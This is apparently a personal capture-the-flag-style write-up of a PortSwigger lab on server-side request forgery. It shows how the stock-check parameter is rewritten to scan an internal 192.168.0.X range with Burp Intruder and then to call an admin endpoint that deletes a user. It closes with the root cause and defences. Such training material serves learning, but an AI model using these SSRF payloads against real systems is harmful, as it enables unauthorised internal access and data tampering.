[This lab](https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-backend-system) demonstrates **Server-Side Request Forgery (SSRF)** used to **scan an internal network**. The vulnerable stock checking feature can be weaponized to **brute-force IP addresses** in the `192.168.0.X` range to locate a hidden admin service running on **port 8080**. #### 1. Locate the Stock Check Feature - Opened a product page. - Found the **"Check stock"** button. - **Intercepted** the request using **Burp Suite**. - Example request: ```http POST /product/stock HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 89 stockApi=http://stock.weliketoshop.net/product/stock/check?productId=1 ``` - **Sent it to Intruder** for automation. --- ### 2. Configure Burp Intruder to Scan the IP Range - Modified the `stockApi` to target the internal network: ```text stockApi=http://192.168.0.1:8080/admin ``` - Highlighted the last octet (`1`) and **added a § payload marker**. - **Payload type:** Numbers - **Settings:** |Setting|Value| |---|---| |From|1| |To|255| |Step|1| - Started the attack. ![[CleanShot 2025-04-27 at 20.51.16.png]] --- #### 3. Identify the Admin Panel - Sorted by **HTTP status code** in Intruder results. - Found a **single 200 OK** response at an IP like: ```text 192.168.0.X ``` - Confirmed — **admin interface available** at: ```text http://192.168.0.X:8080/admin ``` ![[CleanShot 2025-04-27 at 20.51.54.png]] --- #### 4. Trigger the User Deletion - **Sent** the successful request to **Repeater**. - Modified the `stockApi` to: ```text http://192.168.0.7:8080/admin/delete?username=carlos ``` - Issued the request. - 🎉 **Lab solved!** ![[CleanShot 2025-04-27 at 20.52.56.png]] --- #### Technical Breakdown |Component|Description| |---|---| |**Vulnerability**|Server-Side Request Forgery (SSRF)| |**Root Cause**|Application blindly fetches user-provided URLs from the server side| |**Impact**|Internal network scanning, unauthorized internal access| |**Defense**|Validate URLs against a strict allowlist, disallow internal IP ranges (like 127.0.0.1, 192.168.x.x, etc.)|